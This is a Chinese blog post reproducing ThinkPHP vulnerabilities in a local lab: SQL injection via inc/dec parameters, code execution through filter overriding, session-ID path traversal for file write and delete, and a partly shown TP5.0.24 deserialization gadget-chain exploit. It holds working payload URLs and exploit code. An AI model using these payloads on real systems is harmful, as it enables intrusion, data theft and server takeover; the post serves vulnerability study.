
 <!DOCTYPE HTML>
<html lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
  
    <title>TP5.0.24 | buxqm</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=3, minimum-scale=1">
    
    <meta name="author" content="Ycj">
    
    <meta name="description" content="TP漏洞复现合集前言该文章是各种TP漏洞复现的合集，刚开始复现的小伙伴最好先看看开发手册，仔细了解一下框架结构，能够使你更快入手。
TP5.0.15SQL注入复现环境配置使用composer安装TP5.0.15
composer能够更加方便、快速的安装准确的框架版本，windows环境在官网下载安装">
    
    
    
    
    <link rel="alternate" href="/atom.xml" title="buxqm" type="application/atom+xml">
    
    
    <link rel="icon" href="/img/favicon.ico">
    
    
    <link rel="apple-touch-icon" href="/img/author.jpg">
    <link rel="apple-touch-icon-precomposed" href="/img/author.jpg">
    
    <link rel="stylesheet" href="/css/style.css">
</head>
</html>
  <body>
    <header>
      <div>
		
			<div id="imglogo">
				<a href="/"><img src="/img/logo.svg" alt="buxqm" title="buxqm"/></a>
			</div>
			
			<div id="textlogo">
				<h1 class="site-name"><a href="/" title="buxqm">buxqm</a></h1>
				<h2 class="blog-motto"></h2>
			</div>
			<div class="navbar"><a class="navbutton navmobile" href="#" title="Menu">
			</a></div>
			<nav class="animated">
				<ul>
					
						<li><a href="/">Home</a></li>
					
						<li><a href="/archives">Archives</a></li>
					
					<li>
					
					<form class="search" action="//google.com/search" method="get" accept-charset="utf-8">
						<label>Search</label>
						<input type="text" id="search" name="q" autocomplete="off" maxlength="20" placeholder="Search" />
						<input type="hidden" name="q" value="site:yoursite.com">
					</form>
					
					</li>
				</ul>
			</nav>			
</div>

    </header>
    <div id="container">
      <div id="main" class="post" itemscope itemprop="blogPost">
	<article itemprop="articleBody"> 
		<header class="article-info clearfix">
  <h1 itemprop="name">
    
      <a href="/2020/09/30/TP5.0.24漏洞复现合集/" title="TP5.0.24" itemprop="url">TP5.0.24</a>
  </h1>
  <p class="article-author">By
    
      <a href="http://yoursite.com" title="Ycj">Ycj</a>
    </p>
  <p class="article-time">
    <time datetime="2020-09-29T16:00:00.000Z" itemprop="datePublished">2020-09-30</time>
    Updated:<time datetime="2020-10-28T13:38:54.878Z" itemprop="dateModified">2020-10-28</time>
    
  </p>
</header>
	<div class="article-content">
		
		
		<div id="toc" class="toc-article">
			<strong class="toc-title">Contents</strong>
		<ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#TP漏洞复现合集"><span class="toc-number">1.</span> <span class="toc-text">TP漏洞复现合集</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#前言"><span class="toc-number">1.1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#TP5-0-15SQL注入复现"><span class="toc-number">1.2.</span> <span class="toc-text">TP5.0.15SQL注入复现</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#环境配置"><span class="toc-number">1.2.1.</span> <span class="toc-text">环境配置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#数据库配置"><span class="toc-number">1.2.2.</span> <span class="toc-text">数据库配置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#影响范围"><span class="toc-number">1.2.3.</span> <span class="toc-text">影响范围</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#漏洞复现"><span class="toc-number">1.2.4.</span> <span class="toc-text">漏洞复现</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#漏洞分析"><span class="toc-number">1.2.5.</span> <span class="toc-text">漏洞分析</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#TP5-0-任意代码执行-amp-任意文件写入漏洞复现"><span class="toc-number">1.3.</span> <span class="toc-text">TP5.0.*任意代码执行&amp;任意文件写入漏洞复现</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#环境配置-1"><span class="toc-number">1.3.1.</span> <span class="toc-text">环境配置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#影响范围-1"><span class="toc-number">1.3.2.</span> <span class="toc-text">影响范围</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#漏洞复现-1"><span class="toc-number">1.3.3.</span> <span class="toc-text">漏洞复现</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#漏洞分析-1"><span class="toc-number">1.3.4.</span> <span class="toc-text">漏洞分析</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#TP6-0session-任意文件创建-amp-删除漏洞复现"><span class="toc-number">1.4.</span> <span class="toc-text">TP6.0session 任意文件创建&amp;删除漏洞复现</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#环境配置-2"><span class="toc-number">1.4.1.</span> <span class="toc-text">环境配置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#影响范围-2"><span class="toc-number">1.4.2.</span> <span class="toc-text">影响范围</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#漏洞复现-2"><span class="toc-number">1.4.3.</span> <span class="toc-text">漏洞复现</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#漏洞分析-2"><span class="toc-number">1.4.4.</span> <span class="toc-text">漏洞分析</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#TP5-0-24-反序列化利用链分析"><span class="toc-number">1.5.</span> <span class="toc-text">TP5.0.24 反序列化利用链分析</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#环境搭建"><span class="toc-number">1.5.1.</span> <span class="toc-text">环境搭建</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#漏洞复现-3"><span class="toc-number">1.5.2.</span> <span class="toc-text">漏洞复现</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#漏洞分析-3"><span class="toc-number">1.5.3.</span> <span class="toc-text">漏洞分析</span></a></li></ol></li></ol></li></ol>
		</div>
		
		<h1 id="TP漏洞复现合集"><a href="#TP漏洞复现合集" class="headerlink" title="TP漏洞复现合集"></a>TP漏洞复现合集</h1><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>该文章是各种TP漏洞复现的合集，刚开始复现的小伙伴最好先看看<a href="https://www.kancloud.cn/manual/thinkphp5/122950" target="_blank" rel="noopener">开发手册</a>，仔细了解一下框架结构，能够使你更快入手。</p>
<h2 id="TP5-0-15SQL注入复现"><a href="#TP5-0-15SQL注入复现" class="headerlink" title="TP5.0.15SQL注入复现"></a>TP5.0.15SQL注入复现</h2><h3 id="环境配置"><a href="#环境配置" class="headerlink" title="环境配置"></a>环境配置</h3><p>使用composer安装TP5.0.15</p>
<p>composer能够更加方便、快速的安装准确的框架版本，windows环境在官网下载安装程序，选择PHP版本(最好是大于7.2)，安装时可以配置一下代理，不然会很慢。</p>
<p>安装好后执行</p>
<pre><code>composer create-project topthink/think tp 5.0.15</code></pre><p>更多的版本也可以在<a href="https://packagist.org/" target="_blank" rel="noopener">composer官网</a>找到。</p>
<p>使用composer的好处是能够快速切换版本，只需要将framework改成你自己想要的版本，然后执行<code>composer update</code>就好了。</p>
<p><img src="https://i.loli.net/2020/10/04/EazP48swVgmC6pq.png" alt="image.png"></p>
<h3 id="数据库配置"><a href="#数据库配置" class="headerlink" title="数据库配置"></a>数据库配置</h3><p>首先建立一个数据库tptest，然后建立一个user表，字段是id,username。</p>
<p><img src="/images/TP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86/image-20201005191103224.png" alt="image-20201005191103224"></p>
<h3 id="影响范围"><a href="#影响范围" class="headerlink" title="影响范围"></a>影响范围</h3><p>ThinkPHP 5.0.13~ThinkPHP 5.0.15</p>
<h3 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h3><p>漏洞触发点在执行数据插入的时候，所以先在index控制器创建一个插入数据的方法。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">public  function testsql()</span><br><span class="line">    &#123;</span><br><span class="line">        $username = input(&apos;get.username/a&apos;);</span><br><span class="line">        db(&apos;user&apos;)-&gt;where([&apos;id&apos;=&gt; 1])-&gt;insert([&apos;username&apos;=&gt;$username]);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>访问</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/public/index.php/index/index/testsql?username[0]=inc&amp;username[1]=updatexml(1,concat(0x7,user(),0x7e),1)&amp;username[2]=1</span><br></pre></td></tr></table></figure>

<p><img src="/images/TP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86/image-20201005191717380.png" alt="image-20201005191717380"></p>
<p>报错注入成功。</p>
<h3 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h3><p>跟入insert方法，重点在生成sql语句的函数</p>
<p><img src="/images/TP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86/image-20201005192213389.png" alt="image-20201005192213389"></p>
<p>跟入<code>$this-&gt;builder-&gt;insert</code>方法</p>
<p><img src="/images/TP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86/image-20201005192349737.png" alt="image-20201005192349737"></p>
<p>跟进parseData方法，看看它是如何处理我们的数据。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">     <span class="keyword">foreach</span> ($data <span class="keyword">as</span> $key =&gt; $val) &#123;</span><br><span class="line">         $item = <span class="keyword">$this</span>-&gt;parseKey($key, $options);</span><br><span class="line">         <span class="keyword">if</span> (is_object($val) &amp;&amp; method_exists($val, <span class="string">'__toString'</span>)) &#123;</span><br><span class="line">             <span class="comment">// 对象数据写入</span></span><br><span class="line">             $val = $val-&gt;__toString();</span><br><span class="line">         &#125;</span><br><span class="line"><span class="keyword">elseif</span> (is_array($val) &amp;&amp; !<span class="keyword">empty</span>($val)) &#123;</span><br><span class="line">             <span class="keyword">switch</span> ($val[<span class="number">0</span>]) &#123;</span><br><span class="line">                 <span class="keyword">case</span> <span class="string">'exp'</span>:</span><br><span class="line">                     $result[$item] = $val[<span class="number">1</span>];</span><br><span class="line">                     <span class="keyword">break</span>;</span><br><span class="line">                 <span class="keyword">case</span> <span class="string">'inc'</span>:</span><br><span class="line">                     $result[$item] = <span class="keyword">$this</span>-&gt;parseKey($val[<span class="number">1</span>]) . <span class="string">'+'</span> . floatval($val[<span class="number">2</span>]);</span><br><span class="line">                     <span class="keyword">break</span>;</span><br><span class="line">                 <span class="keyword">case</span> <span class="string">'dec'</span>:</span><br><span class="line">                     $result[$item] = <span class="keyword">$this</span>-&gt;parseKey($val[<span class="number">1</span>]) . <span class="string">'-'</span> . floatval($val[<span class="number">2</span>]);</span><br><span class="line">                     <span class="keyword">break</span>;</span><br><span class="line">             &#125;</span><br><span class="line">         &#125;</span><br></pre></td></tr></table></figure>

<p>可以在用户手册看到说明，在thinkphp5.0.5加入了exp、inc、dec方法来处理数据，主要是为了方便字段的自增与自减，这里就是漏洞触发点。</p>
<p>由于没有对数据做任何过滤处理，处理完数据后，直接拼接成sql语句并执行，才导致报错注入的发生。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">INSERT INTO `user` (`username`) VALUES (updatexml(1,concat(0x7,user(),0x7e),1)+1)</span><br></pre></td></tr></table></figure>

<p>我们可以注意到，与inc效果类似的关键字还有exp与dec，于是我们试一试这两个关键字能不能触发。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/public/index.php/index/index/testsql?username[0]=dec&amp;username[1]=updatexml(1,concat(0x7,user(),0x7e),1)&amp;username[2]=1</span><br></pre></td></tr></table></figure>

<p>dec关键字触发漏洞成功，但是exp关键字触发漏洞失败了。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/public/index.php/index/index/testsql?username[0]=exp&amp;username[1]=updatexml(1,concat(0x7,user(),0x7e),1)&amp;username[2]=1</span><br></pre></td></tr></table></figure>

<p>经过调试，发现thinkphp对输入的数据进行了过滤，exp排在黑名单榜首。</p>
<p><img src="/images/TP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86/image-20201005193636907.png" alt="image-20201005193636907"></p>
<p>在exp后加了一个空格，导致case判断失败。</p>
<p>但是该SQL注入无法执行多句，所以比较鸡肋。</p>
<h2 id="TP5-0-任意代码执行-amp-任意文件写入漏洞复现"><a href="#TP5-0-任意代码执行-amp-任意文件写入漏洞复现" class="headerlink" title="TP5.0.*任意代码执行&amp;任意文件写入漏洞复现"></a>TP5.0.*任意代码执行&amp;任意文件写入漏洞复现</h2><h3 id="环境配置-1"><a href="#环境配置-1" class="headerlink" title="环境配置"></a>环境配置</h3><p>本次以TP5.0.0版本作为复现版本。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">composer create-project topthink/think tp 5.0.0</span><br></pre></td></tr></table></figure>

<p>按照之前的方法，将composer.json中的版本信息修改为5.0.0。</p>
<h3 id="影响范围-1"><a href="#影响范围-1" class="headerlink" title="影响范围"></a>影响范围</h3><p>ThinkPHP 5.0.0 ~ ThinkPHP 5.0.23</p>
<h3 id="漏洞复现-1"><a href="#漏洞复现-1" class="headerlink" title="漏洞复现"></a>漏洞复现</h3><p>搭建好服务，并发送如下请求</p>
<p><img src="G:%5CMyBlog%5Csource%5Cimages%5CTP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86%5Cimage-20201019204946854.png" alt="image-20201019204946854"></p>
<p>filter中为你想执行的函数，s(任意变量名都行)为参数，即可实现任意代码执行。</p>
<h3 id="漏洞分析-1"><a href="#漏洞分析-1" class="headerlink" title="漏洞分析"></a>漏洞分析</h3><p>TP5.0.*<a href="https://www.kancloud.cn/manual/thinkphp5/160568" target="_blank" rel="noopener">支持请求伪装</a>，在获取路由时，使用think\Requests类的method方法实现。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[Config::get(<span class="string">'var_method'</span>)])) &#123;</span><br><span class="line">    <span class="keyword">$this</span>-&gt;method = strtoupper($_POST[Config::get(<span class="string">'var_method'</span>)]);</span><br><span class="line">    <span class="keyword">$this</span>-&gt;&#123;<span class="keyword">$this</span>-&gt;method&#125;($_POST);</span><br></pre></td></tr></table></figure>

<p>可以看到，它在使用了可变函数，为的是调用类中的其他请求方法，比如get、post方法，实现请求伪装但是这也让我们可以任意调用该类中的函数。</p>
<p>我们可以发现，在该类的__construct方法中，由于$option参数可控，我们可以任意覆盖该类中的参数。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (property_exists(<span class="keyword">$this</span>, $name)) &#123;</span><br><span class="line">    <span class="keyword">$this</span>-&gt;$name = $item;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>我们要覆盖的参数有两个</p>
<ul>
<li>filter参数</li>
</ul>
<p>filter定义在Requests类中，作为全局的过滤器，一般使用htmlspecialchars之类的函数过滤用户输入的参数，意思就是说会将挨次的将的GET、POST的所有数据作为该函数的参数执行一次，所以我们可以覆盖filter函数为我们想要执行的恶意函数system之类的。</p>
<ul>
<li>method参数</li>
</ul>
<p>在获取路由后，thinkphp会获取当前的路由规则</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$method = $request-&gt;method();</span><br><span class="line"><span class="comment">// 获取当前请求类型的路由规则</span></span><br><span class="line">$rules = <span class="keyword">self</span>::$rules[$method];</span><br></pre></td></tr></table></figure>

<p><img src="G:%5CMyBlog%5Csource%5Cimages%5CTP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86%5Cimage-20201019211153978.png" alt="image-20201019211153978"></p>
<p>当路由规则不在rules数组中，会产生报错，为了防止报错，我们可以将method设为上图中的任意值。</p>
<p>thinkphp在执行用户调用控制器的方法前会使用过滤器将全局参数过滤一遍，而这时，filter函数已经被我们改成了而已函数system。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> <span class="function"><span class="keyword">function</span> <span class="title">filterValue</span><span class="params">(&amp;$value, $key, $filters)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">   $default = array_pop($filters);</span><br><span class="line">   <span class="keyword">foreach</span> ($filters <span class="keyword">as</span> $filter) &#123;</span><br><span class="line">       <span class="keyword">if</span> (is_callable($filter)) &#123;</span><br><span class="line">          <span class="comment">// 调用函数或者方法过滤</span></span><br><span class="line">          $value = call_user_func($filter, $value);</span><br><span class="line">       &#125;</span><br></pre></td></tr></table></figure>

<p>我们可以看到，程序在这里使用is_callable检测函数是否可调用，然后用不断用call_user_func执行该函数，知道将用户输入的变量过滤完，这时我们的恶意代码system(‘whoami’)就成功被执行，这里还可以调用系统静态方法上传shell文件，具体看<a href="https://buxqm.github.io/2020/10/20/nu1lctf2020/" target="_blank" rel="noopener">Nu1L easyTP5</a>。</p>
<h2 id="TP6-0session-任意文件创建-amp-删除漏洞复现"><a href="#TP6-0session-任意文件创建-amp-删除漏洞复现" class="headerlink" title="TP6.0session 任意文件创建&amp;删除漏洞复现"></a>TP6.0session 任意文件创建&amp;删除漏洞复现</h2><h3 id="环境配置-2"><a href="#环境配置-2" class="headerlink" title="环境配置"></a>环境配置</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">composer create-project topthink/think tp 6.0.0</span><br></pre></td></tr></table></figure>

<p>下载好后，将composer.json中的数据修改成如下图所示</p>
<p><img src="/images/TP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86/image-20201016150629322.png" alt="image-20201016150629322"></p>
<p>在app\middleware.php中开启session功能</p>
<p><img src="/images/TP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86/image-20201016150801682.png" alt="image-20201016150801682"></p>
<h3 id="影响范围-2"><a href="#影响范围-2" class="headerlink" title="影响范围"></a>影响范围</h3><p>ThinkPHP 6.0.0~ThinkPHP 6.0.1</p>
<h3 id="漏洞复现-2"><a href="#漏洞复现-2" class="headerlink" title="漏洞复现"></a>漏洞复现</h3><p>漏洞利用点是在session保存时，session文件名可控导致的任意文件创建。</p>
<p>在index控制器引入Session类并添加如下测试方法。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">use</span> <span class="title">think</span>\<span class="title">facade</span>\<span class="title">Session</span>;  </span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">session_test</span><span class="params">()</span></span>&#123;</span><br><span class="line">    Session::set(<span class="string">'id'</span>,<span class="string">'name'</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>访问<code>http://localhost/public/index.php/index/session_test</code>，可以看见在/runtime/session文件夹下根据sessionID创建了session文件，内容就是将session中的数据序列化。</p>
<p><img src="G:%5CMyBlog%5Csource%5Cimages%5CTP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86%5Cimage-20201016152149812.png" alt="image-20201016152149812"></p>
<p>修改sessionID为：aaaaaaaaaaaaaaaaaaaaaaaaaaaa.php(长度为32位)，可以看到成功在\runtime\session文件夹下生成了一个php文件。</p>
<p><img src="/images/TP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86/image-20201016155905781.png" alt="image-20201016155905781"></p>
<p>尝试一下目录穿越，<code>/../../../public/aaaaaaaaaaa.php</code>成功写入public文件夹中。</p>
<p><img src="G:%5CMyBlog%5Csource%5Cimages%5CTP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86%5Cimage-20201016162011090.png" alt="image-20201016162011090"></p>
<h3 id="漏洞分析-2"><a href="#漏洞分析-2" class="headerlink" title="漏洞分析"></a>漏洞分析</h3><p>当执行Session::set方法时，会调用\vendor\topthink\framework\src\think\session\Store.php中的setId方法</p>
<p><img src="/images/TP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86/image-20201016163335534.png" alt="image-20201016163335534"></p>
<p>当传入的SessionId满足32位长度时，就将id设为SessionId，否则就重设SessionId。</p>
<p>之后进入save方法保存用户session。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">save</span><span class="params">()</span>: <span class="title">void</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">$this</span>-&gt;clearFlashData();</span><br><span class="line">    $sessionId = <span class="keyword">$this</span>-&gt;getId();</span><br><span class="line">    <span class="keyword">if</span> (!<span class="keyword">empty</span>(<span class="keyword">$this</span>-&gt;data)) &#123;</span><br><span class="line">        $data = <span class="keyword">$this</span>-&gt;serialize(<span class="keyword">$this</span>-&gt;data);</span><br><span class="line">        <span class="keyword">$this</span>-&gt;handler-&gt;write($sessionId, $data);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;handler-&gt;delete($sessionId);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">$this</span>-&gt;init = <span class="keyword">false</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>跟入write函数。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">protected function writeFile($path, $content): bool</span><br><span class="line">&#123;</span><br><span class="line">    return (bool) file_put_contents($path, $content, LOCK_EX);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>它使用file_put_contents函数将sessionID作为文件名写入文件，所以可以通过目录穿越实现任意文件上传，利用条件是用户能够控制Session内容。</p>
<p>在执行save方法时，可以看到当session内容为空时。使用unlink删除文件，文件名控制方法与上面一样。</p>
<h2 id="TP5-0-24-反序列化利用链分析"><a href="#TP5-0-24-反序列化利用链分析" class="headerlink" title="TP5.0.24 反序列化利用链分析"></a>TP5.0.24 反序列化利用链分析</h2><h3 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h3><p>将composer.json修改为5.0.24版本，执行composer update</p>
<p>在application/index/controller中创建unserilize方法</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span>  <span class="function"><span class="keyword">function</span> <span class="title">unserilize</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"welcome"</span>;</span><br><span class="line">    $input = input(<span class="string">'get.input/s'</span>);</span><br><span class="line">    unserialize($input);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="漏洞复现-3"><a href="#漏洞复现-3" class="headerlink" title="漏洞复现"></a>漏洞复现</h3><p>跟着大佬分析了一下链子<a href="https://www.anquanke.com/post/id/196364#h2-4。" target="_blank" rel="noopener">https://www.anquanke.com/post/id/196364#h2-4。</a></p>
<p>exp</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">namespace</span> <span class="title">think</span>\<span class="title">process</span>\<span class="title">pipes</span>;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Windows</span></span>&#123;</span><br><span class="line">	<span class="keyword">private</span> $files = [];</span><br><span class="line">	<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">()</span></span>&#123;</span><br><span class="line">		<span class="keyword">$this</span>-&gt;files[<span class="number">0</span>]=<span class="keyword">new</span> \think\model\Pivot();</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">namespace</span> <span class="title">think</span>\<span class="title">model</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">use</span> <span class="title">think</span>\<span class="title">Model</span>;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Pivot</span> </span>&#123;</span><br><span class="line">	<span class="keyword">protected</span> $append = [];</span><br><span class="line">	<span class="keyword">protected</span> $updateWhere;</span><br><span class="line">	<span class="keyword">protected</span> $pk;</span><br><span class="line">	<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">()</span></span>&#123;</span><br><span class="line">		<span class="keyword">$this</span>-&gt;append[<span class="number">0</span>]=<span class="string">"getWhere"</span>;</span><br><span class="line">		<span class="keyword">$this</span>-&gt;pk=<span class="string">"1"</span>;</span><br><span class="line">		<span class="keyword">$this</span>-&gt;updateWhere=<span class="keyword">new</span> \think\model\relation\HasOne();</span><br><span class="line">		<span class="keyword">$this</span>-&gt;parent=<span class="keyword">new</span> \think\console\Output();</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">namespace</span> <span class="title">think</span>\<span class="title">model</span>\<span class="title">relation</span>;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">HasOne</span></span>&#123;</span><br><span class="line">	<span class="keyword">protected</span> $query;</span><br><span class="line">	<span class="keyword">protected</span> $bindAttr = [];</span><br><span class="line">	 <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">()</span></span>&#123;</span><br><span class="line">	 	<span class="keyword">$this</span>-&gt;query=<span class="keyword">new</span> \think\db\Query();</span><br><span class="line">	 	<span class="keyword">$this</span>-&gt;bindAttr[<span class="number">0</span>]=<span class="string">"1"</span>;</span><br><span class="line">	 &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">namespace</span> <span class="title">think</span>\<span class="title">db</span>;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Query</span></span>&#123;</span><br><span class="line">	<span class="keyword">protected</span> 